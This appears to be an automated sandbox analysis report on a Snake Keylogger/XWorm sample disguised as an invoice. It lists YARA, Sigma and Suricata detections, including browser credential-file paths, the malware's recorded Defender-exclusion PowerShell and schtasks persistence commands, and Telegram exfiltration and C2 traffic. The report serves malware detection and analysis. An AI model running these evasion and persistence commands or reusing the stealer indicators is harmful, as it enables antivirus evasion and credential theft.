15.2.bxhciy.exe.17053d48.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b4fa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a932:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a72c:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b64:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ab5f:$a4: \Orbitum\User Data\Default\Login Data 0x39f97:$a4: \Orbitum\User Data\Default\Login Data 0x1bb9e:$a5: \Kometa\User Data\Default\Login Data 0x3afd6:$a5: \Kometa\User Data\Default\Login Data
15.2.bxhciy.exe.17053d48.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x154d9:$s1: UnHook 0x34911:$s1: UnHook 0x154e0:$s2: SetHook 0x34918:$s2: SetHook 0x154e8:$s3: CallNextHook 0x34920:$s3: CallNextHook 0x154f5:$s4: _hook 0x3492d:$s4: _hook
15.2.bxhciy.exe.17053d48.5.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15d33:$s8: GrabbedClp 0x3516b:$s8: GrabbedClp 0x15fe6:$s9: StartKeylogger 0x3541e:$s9: StartKeylogger 0x18b16:$x1: $%SMTPDV$ 0x37f4e:$x1: $%SMTPDV$ 0x173a8:$x2: $#TheHashHere%& 0x367e0:$x2: $#TheHashHere%& 0x18abe:$x3: %FTPDV$ 0x37ef6:$x3: %FTPDV$ 0x17348:$x4: $%TelegramDv$ 0x36780:$x4: $%TelegramDv$ 0x1605e:$x5: KeyLoggerEventArgs 0x16680:$x5: KeyLoggerEventArgs 0x35496:$x5: KeyLoggerEventArgs 0x35ab8:$x5: KeyLoggerEventArgs 0x18ae2:$m2: Clipboard Logs ID 0x18d16:$m2: Screenshot Logs ID 0x18e26:$m2: keystroke Logs ID 0x37f1a:$m2: Clipboard Logs ID 0x3814e:$m2: Screenshot Logs ID
25.2.ungagCKiEnZdl.exe.16f23cc0.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
25.2.ungagCKiEnZdl.exe.16f23cc0.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x145c7:$a1: get_encryptedPassword 0x339ff:$a1: get_encryptedPassword 0x14a65:$a2: get_encryptedUsername 0x33e9d:$a2: get_encryptedUsername 0x14327:$a3: get_timePasswordChanged 0x3375f:$a3: get_timePasswordChanged 0x14433:$a4: get_passwordField 0x3386b:$a4: get_passwordField 0x145dd:$a5: set_encryptedPassword 0x33a15:$a5: set_encryptedPassword 0x163cd:$a6: get_passwords 0x35805:$a6: get_passwords 0x16727:$a7: get_logins 0x35b5f:$a7: get_logins 0x163b9:$a8: GetOutlookPasswords 0x357f1:$a8: GetOutlookPasswords 0x15fe6:$a9: StartKeylogger 0x3541e:$a9: StartKeylogger 0x16680:$a10: KeyLoggerEventArgs 0x35ab8:$a10: KeyLoggerEventArgs 0x1605e:$a11: KeyLoggerEventArgsEventHandler
25.2.ungagCKiEnZdl.exe.16f23cc0.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b4fa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a932:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a72c:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b64:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ab5f:$a4: \Orbitum\User Data\Default\Login Data 0x39f97:$a4: \Orbitum\User Data\Default\Login Data 0x1bb9e:$a5: \Kometa\User Data\Default\Login Data 0x3afd6:$a5: \Kometa\User Data\Default\Login Data
25.2.ungagCKiEnZdl.exe.16f23cc0.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x154d9:$s1: UnHook 0x34911:$s1: UnHook 0x154e0:$s2: SetHook 0x34918:$s2: SetHook 0x154e8:$s3: CallNextHook 0x34920:$s3: CallNextHook 0x154f5:$s4: _hook 0x3492d:$s4: _hook
25.2.ungagCKiEnZdl.exe.16f23cc0.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15d33:$s8: GrabbedClp 0x3516b:$s8: GrabbedClp 0x15fe6:$s9: StartKeylogger 0x3541e:$s9: StartKeylogger 0x18b16:$x1: $%SMTPDV$ 0x37f4e:$x1: $%SMTPDV$ 0x173a8:$x2: $#TheHashHere%& 0x367e0:$x2: $#TheHashHere%& 0x18abe:$x3: %FTPDV$ 0x37ef6:$x3: %FTPDV$ 0x17348:$x4: $%TelegramDv$ 0x36780:$x4: $%TelegramDv$ 0x1605e:$x5: KeyLoggerEventArgs 0x16680:$x5: KeyLoggerEventArgs 0x35496:$x5: KeyLoggerEventArgs 0x35ab8:$x5: KeyLoggerEventArgs 0x18ae2:$m2: Clipboard Logs ID 0x18d16:$m2: Screenshot Logs ID 0x18e26:$m2: keystroke Logs ID 0x37f1a:$m2: Clipboard Logs ID 0x3814e:$m2: Screenshot Logs ID
25.2.ungagCKiEnZdl.exe.16f04680.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
25.2.ungagCKiEnZdl.exe.16f04680.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x145c7:$a1: get_encryptedPassword 0x33c07:$a1: get_encryptedPassword 0x5303f:$a1: get_encryptedPassword 0x14a65:$a2: get_encryptedUsername 0x340a5:$a2: get_encryptedUsername 0x534dd:$a2: get_encryptedUsername 0x14327:$a3: get_timePasswordChanged 0x33967:$a3: get_timePasswordChanged 0x52d9f:$a3: get_timePasswordChanged 0x14433:$a4: get_passwordField 0x33a73:$a4: get_passwordField 0x52eab:$a4: get_passwordField 0x145dd:$a5: set_encryptedPassword 0x33c1d:$a5: set_encryptedPassword 0x53055:$a5: set_encryptedPassword 0x163cd:$a6: get_passwords 0x35a0d:$a6: get_passwords 0x54e45:$a6: get_passwords 0x16727:$a7: get_logins 0x35d67:$a7: get_logins 0x5519f:$a7: get_logins
15.2.bxhciy.exe.17034708.6.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
25.2.ungagCKiEnZdl.exe.16f04680.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b4fa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ab3a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x59f72:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a72c:$a3: \Google\Chrome\User Data\Default\Login Data 0x39d6c:$a3: \Google\Chrome\User Data\Default\Login Data 0x591a4:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ab5f:$a4: \Orbitum\User Data\Default\Login Data 0x3a19f:$a4: \Orbitum\User Data\Default\Login Data 0x595d7:$a4: \Orbitum\User Data\Default\Login Data 0x1bb9e:$a5: \Kometa\User Data\Default\Login Data 0x3b1de:$a5: \Kometa\User Data\Default\Login Data 0x5a616:$a5: \Kometa\User Data\Default\Login Data
15.2.bxhciy.exe.17034708.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x145c7:$a1: get_encryptedPassword 0x33c07:$a1: get_encryptedPassword 0x5303f:$a1: get_encryptedPassword 0x14a65:$a2: get_encryptedUsername 0x340a5:$a2: get_encryptedUsername 0x534dd:$a2: get_encryptedUsername 0x14327:$a3: get_timePasswordChanged 0x33967:$a3: get_timePasswordChanged 0x52d9f:$a3: get_timePasswordChanged 0x14433:$a4: get_passwordField 0x33a73:$a4: get_passwordField 0x52eab:$a4: get_passwordField 0x145dd:$a5: set_encryptedPassword 0x33c1d:$a5: set_encryptedPassword 0x53055:$a5: set_encryptedPassword 0x163cd:$a6: get_passwords 0x35a0d:$a6: get_passwords 0x54e45:$a6: get_passwords 0x16727:$a7: get_logins 0x35d67:$a7: get_logins 0x5519f:$a7: get_logins
25.2.ungagCKiEnZdl.exe.16f04680.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x154d9:$s1: UnHook 0x34b19:$s1: UnHook 0x53f51:$s1: UnHook 0x154e0:$s2: SetHook 0x34b20:$s2: SetHook 0x53f58:$s2: SetHook 0x154e8:$s3: CallNextHook 0x34b28:$s3: CallNextHook 0x53f60:$s3: CallNextHook 0x154f5:$s4: _hook 0x34b35:$s4: _hook 0x53f6d:$s4: _hook
25.2.ungagCKiEnZdl.exe.16f04680.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15d33:$s8: GrabbedClp 0x35373:$s8: GrabbedClp 0x547ab:$s8: GrabbedClp 0x15fe6:$s9: StartKeylogger 0x35626:$s9: StartKeylogger 0x54a5e:$s9: StartKeylogger 0x18b16:$x1: $%SMTPDV$ 0x38156:$x1: $%SMTPDV$ 0x5758e:$x1: $%SMTPDV$ 0x173a8:$x2: $#TheHashHere%& 0x369e8:$x2: $#TheHashHere%& 0x55e20:$x2: $#TheHashHere%& 0x18abe:$x3: %FTPDV$ 0x380fe:$x3: %FTPDV$ 0x57536:$x3: %FTPDV$ 0x17348:$x4: $%TelegramDv$ 0x36988:$x4: $%TelegramDv$ 0x55dc0:$x4: $%TelegramDv$ 0x1605e:$x5: KeyLoggerEventArgs 0x16680:$x5: KeyLoggerEventArgs 0x3569e:$x5: KeyLoggerEventArgs
15.2.bxhciy.exe.17034708.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b4fa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ab3a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x59f72:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a72c:$a3: \Google\Chrome\User Data\Default\Login Data 0x39d6c:$a3: \Google\Chrome\User Data\Default\Login Data 0x591a4:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ab5f:$a4: \Orbitum\User Data\Default\Login Data 0x3a19f:$a4: \Orbitum\User Data\Default\Login Data 0x595d7:$a4: \Orbitum\User Data\Default\Login Data 0x1bb9e:$a5: \Kometa\User Data\Default\Login Data 0x3b1de:$a5: \Kometa\User Data\Default\Login Data 0x5a616:$a5: \Kometa\User Data\Default\Login Data
15.2.bxhciy.exe.17034708.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x154d9:$s1: UnHook 0x34b19:$s1: UnHook 0x53f51:$s1: UnHook 0x154e0:$s2: SetHook 0x34b20:$s2: SetHook 0x53f58:$s2: SetHook 0x154e8:$s3: CallNextHook 0x34b28:$s3: CallNextHook 0x53f60:$s3: CallNextHook 0x154f5:$s4: _hook 0x34b35:$s4: _hook 0x53f6d:$s4: _hook
15.2.bxhciy.exe.17034708.6.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15d33:$s8: GrabbedClp 0x35373:$s8: GrabbedClp 0x547ab:$s8: GrabbedClp 0x15fe6:$s9: StartKeylogger 0x35626:$s9: StartKeylogger 0x54a5e:$s9: StartKeylogger 0x18b16:$x1: $%SMTPDV$ 0x38156:$x1: $%SMTPDV$ 0x5758e:$x1: $%SMTPDV$ 0x173a8:$x2: $#TheHashHere%& 0x369e8:$x2: $#TheHashHere%& 0x55e20:$x2: $#TheHashHere%& 0x18abe:$x3: %FTPDV$ 0x380fe:$x3: %FTPDV$ 0x57536:$x3: %FTPDV$ 0x17348:$x4: $%TelegramDv$ 0x36988:$x4: $%TelegramDv$ 0x55dc0:$x4: $%TelegramDv$ 0x1605e:$x5: KeyLoggerEventArgs 0x16680:$x5: KeyLoggerEventArgs 0x3569e:$x5: KeyLoggerEventArgs
Click to see the 67 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe", ParentImage: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe, ParentProcessId: 384, ParentProcessName: SCS AWB and Commercial Invoice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe", ProcessId: 4416, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\bxhciy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\bxhciy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\bxhciy.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\bxhciy.exe, ParentProcessId: 7844, ParentProcessName: bxhciy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\bxhciy.exe", ProcessId: 7976, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp7237.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp7237.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\HOYVjVj.exe, ParentImage: C:\Users\user\AppData\Roaming\HOYVjVj.exe, ParentProcessId: 7420, ParentProcessName: HOYVjVj.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp7237.tmp", ProcessId: 7632, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp5EFD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp5EFD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe", ParentImage: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe, ParentProcessId: 384, ParentProcessName: SCS AWB and Commercial Invoice.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp5EFD.tmp", ProcessId: 6524, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe", ParentImage: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe, ParentProcessId: 384, ParentProcessName: SCS AWB and Commercial Invoice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe", ProcessId: 4416, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp5EFD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp5EFD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe", ParentImage: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe, ParentProcessId: 384, ParentProcessName: SCS AWB and Commercial Invoice.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp5EFD.tmp", ProcessId: 6524, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-04T15:27:30.898393+0100	2803305	3	Unknown Traffic	192.168.2.5	49713	104.21.48.1	443	TCP
2025-02-04T15:27:32.397243+0100	2803305	3	Unknown Traffic	192.168.2.5	49717	104.21.48.1	443	TCP
2025-02-04T15:27:32.663955+0100	2803305	3	Unknown Traffic	192.168.2.5	49718	104.21.48.1	443	TCP
2025-02-04T15:27:34.162379+0100	2803305	3	Unknown Traffic	192.168.2.5	49723	104.21.48.1	443	TCP
2025-02-04T15:27:36.925298+0100	2803305	3	Unknown Traffic	192.168.2.5	49740	104.21.48.1	443	TCP
2025-02-04T15:27:38.623694+0100	2803305	3	Unknown Traffic	192.168.2.5	49756	104.21.48.1	443	TCP
2025-02-04T15:27:39.003169+0100	2803305	3	Unknown Traffic	192.168.2.5	49762	104.21.48.1	443	TCP
2025-02-04T15:27:44.904172+0100	2803305	3	Unknown Traffic	192.168.2.5	49811	104.21.48.1	443	TCP
2025-02-04T15:27:46.387863+0100	2803305	3	Unknown Traffic	192.168.2.5	49824	104.21.48.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-04T15:27:29.152741+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49710	132.226.8.169	80	TCP
2025-02-04T15:27:30.280178+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49710	132.226.8.169	80	TCP
2025-02-04T15:27:31.170638+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49712	132.226.8.169	80	TCP
2025-02-04T15:27:31.769629+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49714	132.226.8.169	80	TCP
2025-02-04T15:27:32.159715+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49712	132.226.8.169	80	TCP
2025-02-04T15:27:33.627782+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49721	132.226.8.169	80	TCP
2025-02-04T15:27:37.571159+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49739	132.226.8.169	80	TCP
2025-02-04T15:27:38.467498+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49739	132.226.8.169	80	TCP
2025-02-04T15:27:39.889356+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49766	132.226.8.169	80	TCP

ETPRO MALWARE Snake Keylogger Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-04T15:27:46.361519+0100	2853006	1	A Network Trojan was detected	192.168.2.5	49818	149.154.167.220	443	TCP
2025-02-04T15:27:48.008899+0100	2853006	1	A Network Trojan was detected	192.168.2.5	49831	149.154.167.220	443	TCP
2025-02-04T15:27:54.341561+0100	2853006	1	A Network Trojan was detected	192.168.2.5	49872	149.154.167.220	443	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-04T15:27:35.028648+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:27:47.944525+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:27:49.578064+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:27:59.643511+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:28:11.954249+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:28:19.509061+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:28:22.173434+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:28:24.477676+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:28:28.050980+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:28:29.581996+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:28:34.798129+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:28:42.283126+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:28:49.501033+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:28:54.595998+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:28:55.440817+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:00.782503+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:00.911305+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:01.039140+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:03.501618+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:06.363688+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:11.766977+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:19.497621+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:24.095876+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:32.861734+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:32.990694+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:33.138941+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:35.297900+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:35.736365+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:48.049101+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:29:49.505340+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:30:00.364451+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:30:12.702227+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:30:17.813723+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:30:18.908453+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:30:19.039324+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:30:19.505409+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:30:24.394055+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:30:29.954308+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:30:42.267050+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:30:49.502416+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:30:52.001154+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:30:52.401839+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:30:54.892996+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:31:01.402853+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:31:08.111567+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:31:09.547505+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:31:19.554260+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP
2025-02-04T15:31:26.407805+0100	2852870	1	Malware Command and Control Activity Detected	45.144.214.104	3908	192.168.2.5	49709	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-04T15:27:35.030662+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:27:47.949543+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:27:59.645004+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:28:12.031698+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:28:22.181281+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:28:24.479454+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:28:28.053721+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:28:29.583456+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:28:34.799456+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
2025-02-04T15:28:42.284937+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	49709	45.144.214.104	3908	TCP
